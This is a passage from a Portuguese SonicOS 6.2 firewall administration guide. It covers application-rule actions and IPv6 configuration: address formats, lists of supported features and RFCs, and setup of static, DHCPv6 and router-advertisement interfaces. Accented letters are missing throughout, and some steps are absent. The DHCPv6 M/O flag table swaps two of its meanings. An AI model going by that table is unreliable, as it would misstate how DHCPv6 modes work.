Etapa 16 Na tela Tipo de ao de regras de aplicativos, selecione a ao a ser executada quando for
encontrado contedo correspondente no tipo especificado de trfego de rede e, em seguida,
clique em Avanar.
Voc ver uma ou mais das seguintes opes, dependendo do tipo de poltica que mostrada
aqui entre parnteses para referncia:

Ao de bloqueio bloquear e enviar resposta de e-mail personalizada (SMTP)
Ao de bloqueio bloquear sem enviar resposta de e-mail (SMTP)
Ao de bloqueio desativar anexo e adicionar texto personalizado (POP3)
Ao de bloqueio pgina de bloqueio personalizada (acesso Web)
Ao de bloqueio redirecionar para nova localizao (acesso Web)
Ao de bloqueio redefinir conexo (acesso Web, FTP)
Ao de bloqueio adicionar mensagem de bloqueio (FTP)
Adicionar banner de e-mail (inclua texto na parte final do e-mail) (SMTP)
Somente log (SMTP, POP3, acesso Web, FTP)
Etapa 17 Na tela Configuraes de ao de regras de aplicativos (se for exibida), digite o texto ou a URL
que deseja usar e, em seguida, clique em Avanar.
A tela Configuraes de ao de regras de aplicativos exibida somente quando voc tiver
selecionado uma ao na etapa anterior que requer texto adicional. Para um tipo de poltica de
acesso Web, se voc tiver selecionado uma ao que redireciona o usurio, voc pode
digitar a nova URL na caixa de texto Contedo.
Etapa 18 Na tela Selecionar nome para poltica de regras de aplicativos, na caixa de texto Nome da
poltica, digite um nome descritivo para a poltica e, em seguida, clique em Avanar.
Etapa 19 Na tela Confirmar novas configuraes da poltica de regras de aplicativos, examine os valores
exibidos da nova poltica e execute um dos procedimentos a seguir:
Para criar uma poltica usando os valores de configurao exibidos, clique em Aceitar.
Para alterar um ou mais dos valores, clique em Voltar.
Na tela Assistente da poltica de regras de aplicativos concludo, para sair do assistente, clique
em Fechar.
| 1441
Apndice D
IPv6
IPv6
Este apndice fornece uma viso geral da implementao de IPv6 do SonicOS, de como o IPv6
opera e de como configurar o IPv6 em sua rede. Este apndice contm as seguintes sees:
Viso geral do recurso na pgina 1443
Configurar o IPv6 na pgina 1453
Visualizao de IPv6 na pgina 1498
Monitoramento de alta disponibilidade de IPv6 na pgina 1499
Monitoramento e diagnstico de IPv6 na pgina 1500
Viso geral do recurso

As sees seguintes fornecem uma viso geral do IPv6:
Certificao de Pronto para IPv6 na pgina 1443
Viso geral da tecnologia IPv6 na pgina 1444
Benefcios do IPv6 na pgina 1446
Recursos do IPv6 suportados pela Dell SonicWALL na pgina 1446
Recursos do IPv6 atualmente no suportados pela Dell SonicWALL na pgina 1449
RFCs de IPv6 suportados na pgina 1451
RFCs de IPv6 no suportados na pgina 1452
Certificao de Pronto para IPv6

A Dell SonicWALL atendeu aos requisitos da Fase 1 e Fase 2 de "Pronto para
IPv6", conforme especificado pelo Frum IPv6, um consrcio mundial que
fornece orientao tcnica para a implantao de IPv6. O Programa de Logotipo
de Pronto para IPv6 um programa de teste da interoperabilidade e
conformidade que se destina a aumentar a confiana do utilizador demonstrando
que o IPv6 est agora disponvel e pronto a ser usado.
A srie de testes Pronto para IPv6 vai desde um nvel bsico de cobertura mnima na Fase 1
at uma cobertura mais completa com a Fase 2:
| 1443
Logotipo da Fase 1 (Prata): No primeiro estgio, o logotipo indica que o produto inclui os
protocolos de ncleo obrigatrios IPv6 e pode interagir com outras implementaes de
IPv6.
Logotipo da Fase 2 (Ouro): A etapa "Pronto para IPv6" implica cuidado apropriado,
consenso tcnico e referncias tcnicas claras. O logotipo de Pronto para IPv6 indicar
que o produto cumpriu com xito os rigorosos requisitos estabelecidos pelo Comit de
Logotipo IPv6 (v6LC).
A Dell SonicWALL foi certificada para o status Pronto para IPv6 de Fase 2 (Ouro). Um futuro
nvel de Fase 3 da cobertura Pronto para IPv6 est atualmente em desenvolvimento.
Para obter mais informaes, consulte: http://www.ipv6ready.org/
Viso geral da tecnologia IPv6

Cada dispositivo conectado com a Internet (computador, impressora, smartphone, medidor
inteligente, etc.) requer um endereo IP. A verso 4 do protocolo de Internet (IPv4) fornece
aproximadamente 4,3 bilhes de endereos IP nicos. A rpida expanso global do uso de
Internet, telefones celulares e telefonia VoIP conduzir, em breve, ao esgotamento destes 4,3
bilhes de endereos IP.
A 3 de fevereiro de 2011, a IANA (Internet Assigned Numbers Authority Autoridade para
atribuio de nmeros na Internet) distribuiu os ltimos blocos de endereos IPv4 que
restavam pelos Registros Regionais de Internet (RIRs). Depois de os RIRs distriburem estes
endereos pelos ISPs ao longo deste ano, a proviso mundial de novos endereos IPv4 se
esgotar.
Felizmente, a IETF (Internet Engineering Task Force) comeou a planejar este dia j em 1992
e, em 1998, foi publicada a RFC 2460 para definir a verso 6 do protocolo de Internet (IPv6).
Aumentando o tamanho dos endereos de 32 bits para 128 bits, o IPv6 aumenta
dramaticamente o nmero de endereos disponveis em comparao ao IPv4:
IPv4: 4.294.967.296 endereos
IPv6: 340.282.366.920.938.463.463.374.607.431.768.211.456 endereos
Compreender os endereos IPv6

Os endereos IPv6 so escritos em oito grupos de quatro dgitos hexadecimais separados por
dois-pontos, no formato:
XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX
Os endereos IPv6 esto logicamente divididos em duas partes: um prefixo de (sub-)rede de
64 bits e um identificador de interface de 64 bits. Aqui est um exemplo de um endereo IPv6:
2001:0db8:85a3:0000:0000:8a2e:0370:7334
Nota Os dgitos hexadecimais nos endereos IPv6 no so sensveis a maisculas e minsculas.
Um endereo IPv6 pode ser abreviado usando as duas regras seguintes:

1. Os zeros iniciais em um valor de 16 bits podem ser omitidos. Assim, nosso endereo
exemplificativo pode ser abreviado do formato completo:
2001:0db8:85a3:0000:0000:8a2e:0370:7334
para este formato abreviado:
2001:db8:85a3:0:0:8a2e:370:7334

2. possvel exprimir qualquer nmero de grupos consecutivos de quatro zeros
(tecnicamente, 16 bits de zeros) por meio de dois-pontos duplos (o smbolo "::").
Combinando estas duas regras, nosso endereo exemplificativo pode ser abreviado do
formato completo:
2001:0db8:85a3:0000:0000:8a2e:0370:7334
para este formato abreviado:
2001:db8:85a3::8a2e:370:7334
Tipo de endereo Endereo completo Endereo abreviado

endereo unicast 1080:0:0:0:8:800:200C:417A 1080::8:800:200C:417A
endereo de difuso FF01:0:0:0:0:0:0:101 FF01::101
seletiva
endereo de loopback 0:0:0:0:0:0:0:1 ::1
endereo no 0:0:0:0:0:0:0:0 ::
especificado
Nota As redes devem estar conectadas com a Internet IPv4 para se conectarem com a Internet
IPv6.
Nota A pilha do IPv6 deve estar habilitada para computadores nos sites da rede local.
Aqui fica uma imagem simplificada demonstrando o modelo de conectividade para uma
implantao tpica de IPv6.
SonicWALL IPv6 Internet Gateway
Secure Remote Access SRA EX7000
Server-1
DMZ
PC-1
IPv6 Public Servers
Remote Office #1 IPv4 IPv6

Internet Internet
SonicWALL IPv6 Internet Gateway IPv6 communication

Secure Remote Access
Legend of network in this network:
SRA EX7000
connections: PC-1 to PC-2

IPv4 PC-2 to PC-3
DMZ IPv6 PC-1 to Server 1
IPv4 and IPv6 dual PC-2 to Server-1
PC-2 PC-3
address interface PC-3 to Server-1
Remote Office #2
| 1445
O diagrama seguinte apresenta uma comparao dos elementos de cabealho entre IPv4 e
IPv6.
Benefcios do IPv6
O IPv6 inclui alguns recursos essenciais para superar as limitaes verificadas no IPv4. O
novo padro IP expande o IPv4 em vrios aspectos importantes:
Tnel 6to4 (permite que os ns IPv6 se conectem para fora dos servios IPv6 por meio de
uma rede IPv4)
Tnel automtico 6to4
Tnel GRE
Tnel manual IPv6
Novo e simplificado formato de cabealho IPv6
Nmero massivamente grande de endereos IPv6 disponveis
Infraestrutura eficiente e hierrquica de endereamento e roteamento
Atribuio automtica de endereos a hosts e roteadores usando NDP (Neighbor
Discovery Protocol Protocolo de descoberta de vizinhana) e DHCPv6
Configurao de endereos com e sem monitoramento de estado
Segurana integrada recomenda-se vivamente AH e ESP
Melhor suporte para QoS etiqueta de fluxo no cabealho
Novo protocolo para interao entre ns vizinhos
Extensibilidade para novos recursos usando cabealhos de extenso
Recursos do IPv6 suportados pela Dell SonicWALL

Segue-se uma lista de servios e recursos do IPv6 que so atualmente suportados pela Dell
SonicWALL:
Regras de acesso
Objetos de endereos

Gerenciamento avanado da largura de banda:
Monitor de gerenciamento de largura de banda
Anti-Spyware
Servidor App Flow:
IPv6 App Flow gerando para servidor App Flow
IPv6 App Flow gerando para servidor App Flow de terceiros
Firewall do aplicativo:
Preveno de ataques:
Ataque Land
Antifalsificao MAC
Ping of Death
Smurf
SYN Flood
Imposio do Client Anti-Virus
Cache de conexo
Monitor de conexo:
Filtragem de endereos IPv6
Filtragem de contedo:
Restrio de cookies, ActiveX, Java
Lista personalizada do CFS
Lista de excluso CFS
Servio de filtragem de contedo
Bloqueio de palavras-chave
DHCP:
Servidor DHCP
Escopo de concesso dinmica
Opes genricas
Opes integradas (servidor WINS/DNS)
Persistncia de concesso
Escopo de concesso esttica
Diagnstico:
Nslookup
Ping6
Nslookup reversa
Rota de rastreamento
Cliente DNS
Pesquisa de DNS e pesquisa reversa de nome
Pilha dual IPv4 e IPv6
EPRT
EPSV
FTPv6
| 1447
Proteo contra inundao:
Proxy de sincronizao de TCP
Manipulao de fragmentao
Antivrus do gateway
Validao de cabealho
Alta disponibilidade:
Cache de conexo
Servidor DHCP
FTP
IP de monitoramento
NDP
SonicPoint
ULAv6
VPN
Gerenciamento HTTP/HTTPS por IPv6
ICMPv6
IDP
[IDP]
IKEv2
Interface:
Modo de cliente DHCP
Interface IPv6
Modo de cliente PPPoE
Modo com fio
Servio de preveno contra intruses
Proteo contra falsificao de IP
Mensagens Syslog de IPv4, incluindo mensagens com endereos IPv6
Limite de conexes de IPv6
ISATAP
Registrar:
Entrada de log de endereo IPv6
Registro de eventos IPv6
Exclusividade de login
Roteamento de difuso seletiva com descoberta de ouvinte de difuso seletiva
NAT
Balanceamento de carga NAT (somente Sticky IP/sem suporte de investigao)
Protocolo de descoberta de vizinhana
Conexes NetExtender para usurios com endereos IPv6
NDP
OSPFv3
Captura de pacotes
Ping

Mapeamento QoS
Manipulao de reagrupamentos
Gerenciamento remoto
RIPng
Roteamento
Servios de segurana para trfego IPv6 com DPI
Tnel IPv6 site a site com IPSec para segurana
SNMP
Suporte de IPv6 de SonicPoint
SSL VPN
Inspeo com monitoramento de estado de trfego IPv6
Syslog:
Mensagens Syslog de IPv4 para incluir endereos IPv6
Criao de tnel
Criao de tnel IPv4 para IPv6
Criao de tnel IPv6 para IPv4
Usurios:
Gerenciamento e login de usurios IPv6
Exclusividade de login
Status do usurio
Assistente virtual
Visualizao
Monitor de App Flow
Relatrio de App Flow
Relatrio de ameaas
Monitor de usurios
VLAN:
VLAN de IPv6 em modo de ponte de camada 2
Interface VLAN de IPv6
Modo de cliente PPPoE
Polticas de VPN
Sem Fio
Recursos do IPv6 atualmente no suportados pela Dell SonicWALL

Segue-se uma lista de servios e recursos do IPv6 que atualmente no so suportados pela
Dell SonicWALL.
Nota SonicOS 6.2 um firmware de pilha dual de IP. Os recursos que no so suportados no
IPv6 continuam sendo suportados no IPv4.
Objetos de endereos:
DAO
| 1449
FQDN
Anti-spam
Filtro de botnets
Interface de linha de comando
Conectar servidor App Flow com endereo IPv6
Filtragem de contedo:
Poltica de CFS por faixa de endereo IP
Websense Enterprice
DHCP sobre VPN
Retransmisso de DHCP
DPI-SSL
Objetos de endereos dinmicos para endereos IPv6
DNS dinmico
Configurao de E-CLI
Proteo contra inundao:
ICMP
UDP
FQDN
Filtro GeoIP
Global VPN Client (GVC)
GMS
VPN:
DHCP sobre VPN
Grupo VPN
IKE
IKE DPD
Servidor L2TP
IKEv2 mvel
OCSP
VPN baseado em Rota
H.323
Alta disponibilidade:
Difuso seletiva v6
Oracle SQL/Net
RTSP
VoIP
IKEv1
Interface:
Modo de cliente L2TP
Modo transparente
Auxiliar de IP
Mensagens Syslog de IPv6
LDAP

Registrar:
Logs de IPNET Stack
Registrar resoluo de nome de DNS
Antifalsificao do IP do MAC
Proxy de difuso seletiva
Roteamento de difuso seletiva
NAT entre endereos IPv6 e IPv4
NAT IPv4 para IPv6
NAT IPv6 para IPv4
NetBIOS sobre VPN
Monitor de rede
NTP
Mapeamento QoS
RADIUS
Encaminhamento de difuso seletiva RAS
RBL
VPNs baseados em rotas
Conexo nica
Filtragem de lista negra em tempo real (RBL) SMTP
SSH
Controle de SSL
Protocolo com monitoramento de estado:
Oracle SQL/Net
SIP
Syslog:
Mensagens Syslog de IPv6 para incluir endereos IPv6
Usurios:
Servio para convidados
LDAP
Radius
SSO
Relatrios do
VLAN:
Modo de cliente DHCP
Modo de cliente L2TP
VoIP
Acelerao de WAN
Balanceamento de carga da WAN
Proxy da Web
RFCs de IPv6 suportados

Esta seo lista os RFCs de IPv6 suportados no SonicOS 6.2.
| 1451
Pilha de TCP/IP e protocolos de rede
RFC 1886 Extenses DNS para suportar IP verso 6 [cliente dns IPAPPL]
RFC 1981 Descoberta de MTU do caminho para IPv6
RFC 2113 Opo de alerta de roteador IP
RFC 2373 Arquitetura de endereamento de IPv6
RFC 2374 Um formato de endereo unicast global agregvel de IPv6 (substitudo por 3587)
RFC 2375 Atribuies de endereos de difuso seletiva de IPv6
RFC 2460 Especificao de IPv6
RFC 2461 Descoberta de vizinhana para IPv6
RFC 2462 Configurao automtica de endereos sem monitoramento de estado de IPv6
RFC 2463 ICMPv6 para especificao de IPv6
RFC 2464 Transmisso de pacotes IPv6 por redes Ethernet
RFC 2473 Criao de tneis de pacotes genricos em especificao de IPv6
RFC 2474 Definio do campo de servios diferenciados (campo DS) nos cabealhos IPv4
e IPv6
RFC 2545 Uso de extenses multiprotocolo BGP-4 para roteamento entre domnios IPv6
RFC 2553 Extenses de interface bsica de soquetes para IPv6
RFC 2710 Descoberta de ouvinte de difuso seletiva (MLD) para IPv6
RFC 2711 Opo de alerta de roteador IPv6
RFC 2784 Encapsulamento de roteamento genrico
RFC 2893 Mecanismos de transio para hosts e roteadores IPv6
RFC 2991 Problemas de vrios caminhos na seleo de prximo salto unicast e de difuso
seletiva
RFC 3056 Conexo de domnios IPv6 via nuvens IPv4
RFC 3484 Seleo de endereos padro para protocolo de Internet verso 6 (IPv6) (sem
"hooks" de polticas)
RFC 3493 Extenses de interface bsica de soquetes para IPv6
RFC 3513 Arquitetura de endereamento do protocolo de Internet verso 6 (IPv6)
RFC 3542 Interface de programa de aplicativo (API) avanada de soquetes para IPv6
RFC 3587 Formato de endereo unicast global de IPv6 (substitui 2374)
Conformidade com IPsec

RFC 1826 Cabealho de autenticao de IP [AH antigo]
RFC 1827 Carga de segurana de encapsulamento (ESP) de IP [ESP antigo]
Conformidade com NAT

RFC 2663 Terminologia e consideraes de conversor de endereos de rede (NAT) de IP.
RFC 3022 Conversor de endereos de rede de IP tradicional (NAT tradicional).
Conformidade com DNS

RFC 1886 Extenses DNS para suportar IP verso 6
RFCs de IPv6 no suportados

Esta seo lista os RFCs de IPv6 que atualmente no so suportados no SonicOS 6.2.
RFC 2002 Suporte mobilidade de IP
RFC 2766 Converso de endereos de rede converso de protocolos (NAT-PT)
RFC 2472 IP verso 6 sobre PPP

RFC 2452 Base de informaes de gerenciamento de IP verso 6 para o protocolo de
controle de transmisso (TCP).
RFC 2454 Base de informaes de gerenciamento de IP verso 6 para o protocolo de
datagrama de usurio (UDP).
RFC 2465 Base de informaes de gerenciamento para IP verso 6: Convenes textuais
e grupo geral.
Configurar o IPv6
As sees a seguir descrevem como configurar o IPv6:
Configurao da interface IPv6 na pgina 1453
Configurar interfaces de tnel de IPv6 na pgina 1467
Acessar a interface de usurio Dell SonicWALL usando IPv6 na pgina 1488
Configurao da rede IPv6 na pgina 1488
Configurao das regras de acesso de IPv6 na pgina 1495
Configuraes avanadas do firewall de IPv6 na pgina 1495
Configurao de VPN IPSec no IPv6 na pgina 1496
Configurao de SSL VPN para IPv6 na pgina 1497
Configurao da interface IPv6

As interfaces IPv6 so configuradas na pgina Rede > Interfaces clicando na opo IPv6 para
o boto de opo Visualizar verso de IP no canto superior direito da pgina.
Por padro, todas as interfaces IPv6 aparecem como roteadas sem endereo IP. possvel
adicionar mltiplos endereos IPv6 na mesma interface. A atribuio automtica de IP s pode
ser configurada em interfaces WAN.
Cada interface pode ser configurada para receber anncios de roteador ou no. O IPv6 pode
ser habilitado ou desabilitado em cada interface.
Nota A atribuio de zonas para uma interface deve ser configurada por meio da pgina da
interface IPv4 antes de passar para o modo IPv6.
| 1453
As sees a seguir descrevem a configurao de interfaces IPv6:
Restries de configurao de interfaces IPv6 na pgina 1454
Configurar uma interface para o modo esttico de IPv6 na pgina 1454
Configurar uma interface para o modo DHCPv6 na pgina 1460
Configurar uma interface para o modo automtico na pgina 1464
Configurar uma interface para PPPoE na pgina 1466
Configurar uma subinterface de VLAN na pgina 1467
Configurar uma interface para o modo com fio na pgina 1467
Restries de configurao de interfaces IPv6

No possvel configurar a interface HA para IPv6.
Somente a interface pai do grupo SwitchPort pode ser configurada como uma interface
IPv6, logo todos os filhos de um grupo de portas de comutador devem ser excludos desta
lista.
Os grupos de pontes de camada 2 e zonas so configuraes compartilhadas entre IPv4
e IPv6 em uma interface. Depois de configurados no lado IPv4, o lado IPv6 da interface
usar a mesma configurao.
O gateway padro e os servidores DNS s podem ser configurados para interfaces de zona
de WAN.
As interfaces VLAN no so atualmente suportadas.
O modo com fio suportado para IPv6, mas voc no pode editar nenhuma das
configuraes. Ao invs, o SonicOS usa as mesmas opes de configurao definidas
para IPv4.
Configurar uma interface para o modo esttico de IPv6

O modo esttico fornece ao usurio uma forma de atribuir um endereo IPv6 esttico, em vez
de um endereo atribudo automaticamente. Usando o modo esttico, a interface IPv6 ainda
pode receber anncios de roteador e registrar um endereo autnomo da opo de prefixo
correspondente. O modo esttico no perturba a execuo da configurao automtica de
endereo sem monitoramento de estado na interface IPv6, exceto se o usurio desabilitar
manualmente.

O diagrama a seguir mostra uma topologia de amostra com IPv6 configurado no modo esttico.
possvel atribuir trs tipos de endereo IPv6 neste modo:

Endereo automtico
Endereo autnomo
Endereo esttico
Para configurar uma interface para um endereo IPv6 esttico, realize as seguintes etapas:

Etapa 2 Clique no boto IPv6 no canto superior direito da pgina. So exibidos os endereos IPv6 para
o dispositivo.
Etapa 3 Clique no cone Configurar da interface para a qual voc deseja configurar um endereo IPv6.
| 1455
Nota A atribuio de zonas para interfaces deve ser configurada na pgina de endereamento
de IPv4. Para modificar a atribuio de zonas para uma interface IPv6, clique no boto IPv4
no canto superior direito da pgina, modifique a zona da interface e, em seguida, retorne
pgina da interface IPv6.
Etapa 4 No menu suspenso Atribuio de IP, selecione Esttico.

Etapa 5 Insira o Endereo IPv6 da interface.
Etapa 6 Insira o Comprimento do prefixo do endereo.
Etapa 7 Se esta for a interface WAN primria, insira o endereo IPv6 do Gateway padro. Se esta no
for a interface WAN primria, qualquer entrada de gateway padro ser ignorada, por isso voc
poder deixar como ::. (Os dois-pontos so a abreviatura para um endereo em branco, ou
0:0:0:0:0:0:0:0.)
Etapa 8 Se esta for a interface WAN primria, insira at trs endereos IPv6 de Servidor DNS. Mais
uma vez, se esta no for a interface WAN primria, quaisquer entradas de servidor DNS sero
ignoradas.
Etapa 9 Selecione Habilitar anncio de roteador para fazer desta uma interface de anncio que
distribui informaes de rede e prefixo.
Etapa 10 Selecione Anunciar prefixo de sub-rede ou endereo esttico primrio de IPv6 para
adicionar um prefixo padro lista de prefixos de anncio da interface. Este prefixo o prefixo
de sub-rede do endereo esttico primrio IPv6 da interface. Esta opo ajudar todos os
hosts do link a permanecerem na mesma sub-rede.

Configurar opes avanadas de interface IPv6 e mltiplos endereos IPv6
Realize as seguintes etapas para modificar as opes avanadas da interface IPv6 ou para
configurar mltiplos endereos IPv6 estticos.
Etapa 2 Clique no boto Adicionar endereo para configurar mltiplos endereos IPv6 estticos para
a interface.
| 1457
Nota S podem ser adicionados mltiplos endereos IPv6 a uma interface que esteja configurada
no modo de endereo IPv6 esttico. No possvel configurar mltiplos endereos IPv6 no
modo Automtico ou DHCPv6.
Etapa 3 Insira o Endereo IPv6 do endereo adicional da interface.

Etapa 4 Insira o Comprimento do prefixo do endereo.
Etapa 5 Selecione Anunciar prefixo de sub-rede ou endereo esttico primrio de IPv6 para
adicionar um prefixo padro lista de prefixos de anncio da interface. Este prefixo o prefixo
de sub-rede do endereo esttico primrio IPv6 da interface. Esta opo ajudar todos os
hosts do link a permanecerem na mesma sub-rede.
Etapa 7 possvel configurar as seguintes opes adicionais na guia Avanado no ttulo
Configuraes avanadas:
Selecione Desabilitar todo o trfego IPv6 na interface para evitar que a interface
manipule todo o trfego IPv6. Desabilitar o trfego IPv6 pode melhorar o desempenho
do firewall para trfego que no IPv6. Se o firewall for implantado em um ambiente IPv4
puro, a Dell SonicWALL recomenda que voc habilite esta opo.
Selecione Habilitar escuta para anncio de roteador para que o firewall receba
anncios de roteador. Se estiver desabilitada, a interface filtra todas as mensagens de
anncio de roteador de entrada, o que melhora a segurana eliminando a possibilidade
de receber parmetros de rede maliciosos (por exemplo, informaes de prefixo ou
gateway padro). Esta opo no visvel no modo Automtico. No modo Automtico,
a opo est sempre habilitada.
Selecione Habilitar configurao automtica de endereo sem monitoramento de
estado para permitir a atribuio de endereos IPv6 autnomos a esta interface. Se
esta opo estiver desmarcada, todos os endereos IPv6 autnomos atribudos sero
removidos desta interface. Esta opo no visvel no modo Automtico. No modo
Automtico, a opo est sempre habilitada.
Insira um valor numrico para Transmisses de deteco de endereo duplicado
para especificar o nmero de mensagens consecutivas de solicitao de vizinho
enviadas ao executar a deteco de endereo duplicado (DAD) antes de atribuir um
endereo provisrio interface. Um valor de 0 indica que a DAD no executada na
interface.
Do mesmo modo com ARP grtis de IPv4, o n IPv6 usa a mensagem de deteco de
vizinho para detectar um endereo IPv6 duplicado no mesmo link. A DAD deve ser
executada em qualquer endereo Unicast (exceto endereos Anycast) antes de atribuir
um provisrio a uma interface IPv6.
Definir configuraes de anncio de roteador
Um anncio de roteador permite que roteadores IPv6 anunciem endereos de servidor

recursivo DNS para hosts IPv6. A configurao de DNS com base em anncio de roteador
uma alternativa til e opcional em redes onde o endereo de um host IPv6 configurado
automaticamente por meio de configurao automtica de endereo sem monitoramento de
estado IPv6 e onde os atrasos na obteno de endereos de servidor e na comunicao com
os servidores so crticos. O anncio de roteador permite que o host obtenha os endereos de
servidor mais prximos em cada link. Alm disso, aprende estes endereos a partir da mesma
mensagem RA que fornece a informao de configurao para o link, evitando assim a

execuo de um protocolo adicional. Isso pode ser benfico em alguns ambientes mveis,
como IPv6 mvel. A implementao do IPv6 da Dell SonicWALL est em plena conformidade
com RFC 4861 em termos de descoberta de roteador e prefixo.
Nota O anncio de roteador s pode ser habilitado quando a interface est no modo Esttico.
Para configurar o anncio de roteador para uma interface IPv6, realize as seguintes etapas.
Etapa 1 Na caixa de dilogo Editar interface, clique na guia Anncio de roteador.
Etapa 2 Selecione a caixa de seleo Habilitar anncio de roteador para fazer desta uma interface
de anncio que distribuir informaes de rede e prefixo.
Etapa 3 Opcionalmente, voc pode modificar as seguintes configuraes do anncio de roteador:
Perodo de intervalo do anncio de roteador o intervalo de tempo permitido entre
o envio de anncios de roteador de difuso seletiva no solicitados a partir desta
interface, em segundos.
MTU de link a MTU recomendada para o link da interface. Um valor de 0 significa
que o firewall no anunciar a MTU de link para o link.
Tempo alcanvel o tempo durante o qual um n assume que um vizinho
alcanvel aps receber uma confirmao de alcance. Um valor de 0 significa que este
parmetro no est especificado para este firewall.
Tempo de retransmisso o tempo entre mensagens retransmitidas de solicitao
de vizinho. Um valor de 0 significa que este parmetro no est especificado para este
firewall.
Limite de saltos atual o valor padro que deve ser inserido no campo Contagem de
saltos do cabealho IP para pacotes IP de sada. Um valor de 0 significa que este
parmetro no est especificado para este firewall.
| 1459
Tempo de vida do roteador o tempo de vida em que o firewall aceito como um
roteador padro. Um valor de 0 significa que o roteador no um roteador padro.
Etapa 4 Selecione a caixa de seleo Gerenciado para definir o sinalizador de configurao de
endereo gerenciado na mensagem de anncio de roteador. Se estiver definida, indica que os
endereos IPv6 esto disponveis por meio de protocolo de configurao dinmica de hosts.
Etapa 5 Selecione a caixa de seleo Outra configurao para definir o sinalizador de outra
configurao na mensagem de anncio de roteador. Se estiver definida, indica que a
informao de outra configurao est disponvel por meio de protocolo de configurao
dinmica de hosts.
Definir configuraes de prefixo de anncio de roteador
Etapa 1 Clique no boto Adicionar prefixo para configurar um prefixo de anncio. Os prefixos de
anncio so usados para fornecer hosts com prefixos para determinao no link e configurao
automtica de endereo.
Etapa 2 Insira o Prefixo que deve ser anunciado com a mensagem de anncio de roteador.
Etapa 3 Insira o Tempo de vida vlido para definir o perodo de tempo (em minutos) durante o qual o
prefixo vlido para efeitos de determinao no link. Um valor de "71582789" significa que o
tempo de vida infinito.
Etapa 4 Insira o Tempo de vida preferido para definir o perodo de tempo durante o qual os endereos
gerados a partir do prefixo por meio de configurao automtica de endereo sem
monitoramento de estado permanecem como preferidos. Um valor de "71582789" significa que
o tempo de vida infinito.
Etapa 5 Opcionalmente, clique na caixa de seleo No link para habilitar o sinalizador no link na opo
Informao de prefixo, que indica que este prefixo pode ser usado para determinao no link.
Etapa 6 Opcionalmente, clique na caixa de seleo Autnomo para habilitar o sinalizador de
configurao de endereo autnomo na opo Informao de prefixo, que indica que este
prefixo pode ser usado para configurao de endereo sem monitoramento de estado.
Configurar uma interface para o modo DHCPv6
DHCPv6 (DHCP para IPv6) um protocolo cliente/servidor que permite a definio de

configurao sem monitoramento de estado ou configurao de endereo com monitoramento
de estado para hosts IPv6. O cliente DHCPv6 habilitado para aprender endereos IPv6 e
parmetros de rede quando a interface est configurada no modo DHCPv6.
DHCPv6 define dois modos de configurao diferentes:

Modo DHCPv6 com monitoramento de estado: Os clientes DHCPv6 exigem o endereo
IPv6 juntamente com outros parmetros de rede (por exemplo, servidor DNS, nome de
domnio, etc.).
Modo DHCPv6 sem monitoramento de estado: O cliente DHCPv6 obtm somente os
parmetros de rede que no o endereo IPv6. A escolha de um destes modos depende do
sinalizador de configurao de endereo gerenciado (M) ou outra configurao (O) na
mensagem anunciada de anncio de roteador:
M = 0, O = 0: Nenhuma infraestrutura DHCPv6.
M = 1, O = 1: O host IPv6 usa DHCPv6 para o endereo IPv6 e outras configuraes
de parmetros de rede.
M = 0, O = 1: O host IPv6 usa DHCPv6 somente para a atribuio de endereo IPv6.
M = 1, O = 0: O host IPv6 usa DHCPv6 somente para definies de outros parmetros
de rede, ou seja, DHCPv6 sem monitoramento de estado.
O diagrama a seguir mostra uma topologia de amostra de DHCPv6.
Existem trs tipos de endereos IPv6 que podem ser atribudos sob DHCPv6:
Endereo automtico
Endereo autnomo
Endereo IPv6 atribudo por meio de cliente DHCPv6
| 1461
Para configurar uma interface para um endereo DHCPv6, realize as seguintes etapas:

Etapa 2 Clique no boto IPv6 no canto superior direito da pgina. So exibidos os endereos IPv6 para
o dispositivo.
Etapa 4 No menu suspenso Atribuio de IP, selecione DHCPv6.
Etapa 5 As opes a seguir podem ser definidas para interfaces IPv6 configuradas para o modo
DHCPv6:
Usar opo de confirmao rpida se habilitada, o cliente DHCPv6 usa a opo de
confirmao rpida para usar a troca de duas mensagens para a atribuio de
endereo.
Enviar dicas para renovar IP anterior ao inicializar se habilitada, o cliente DHCPv6
tentar renovar o endereo atribudo antes ao inicializar o firewall.
Etapa 6 Defina o Modo DHCPv6 para a interface. Conforme exigido pelo RFC, o cliente DHCPv6
depende da mensagem de anncio de roteador para decidir qual o modo (com ou sem
monitoramento de estado) que deve escolher. Esta definio limitar a escolha do usurio se
este pretender determinar o modo DHCPv6 sozinho. A implementao do DHCPv6 da Dell
SonicWALL define dois modos diferentes para encontrar um equilbrio entre conformidade e
flexibilidade:
Automtico neste modo, a interface IPv6 configura endereos IPv6 usando a
configurao automtica com/sem monitoramento de estado de acordo com as
definies M e O na mensagem de anncio de roteador recebida mais recentemente.
Manual no modo manual, o modo DHCPv6 configurado manualmente,
independentemente de qualquer anncio de roteador recebido. A opo Solicitar
somente informao sem monitoramento de estado determinar qual o modo

DHCPv6 usado. Se esta opo no estiver selecionada, o cliente DHCPv6 est no
modo com monitoramento de estado; se estiver selecionada, o cliente DHCPv6 est
no modo sem monitoramento de estado e obtm somente os parmetros de rede.
Etapa 7 Opcionalmente, selecione a caixa de seleo Solicitar somente informao sem
monitoramento de estado para que os clientes DHCPv6 solicitem somente a definio de
parmetros de rede a partir do servidor DHCPv6. O endereo IPv6 atribudo por meio de
configurao automtica sem monitoramento de estado.
Etapa 8 Opcionalmente, possvel configurar o Login de gerenciamento ou Login de usurio.
Etapa 9 Clique em OK para concluir a configurao, clique na guia Avanado para configurar as
opes avanadas ou clique na guia Protocolo para visualizar a informao de configurao
com e sem monitoramento de estado de DHCPv6.
Definir configuraes avanadas para uma interface IPv6
As opes a seguir podem ser configuradas na guia Avanado da caixa de dilogo Editar
interface IPv6:
Selecione Desabilitar todo o trfego IPv6 na interface para evitar que a interface
manipule todo o trfego IPv6. Desabilitar o trfego IPv6 pode melhorar o desempenho do
firewall para trfego que no IPv6. Se o firewall for implantado em um ambiente IPv4 puro,
a Dell SonicWALL recomenda que voc habilite esta opo.
Selecione Habilitar escuta para anncio de roteador para que o firewall receba anncios
de roteador. Se estiver desabilitada, a interface filtra todas as mensagens de anncio de
roteador de entrada, o que melhora a segurana eliminando a possibilidade de receber
parmetros de rede maliciosos (por exemplo, informaes de prefixo ou gateway padro).
Esta opo no visvel no modo Automtico. No modo Automtico, a opo est sempre
habilitada.
Selecione Habilitar configurao automtica de endereo sem monitoramento de
estado para permitir a atribuio de endereos IPv6 autnomos a esta interface. Se esta
opo estiver desmarcada, todos os endereos IPv6 autnomos atribudos sero
removidos desta interface. Esta opo no visvel no modo Automtico. No modo
Automtico, a opo est sempre habilitada.
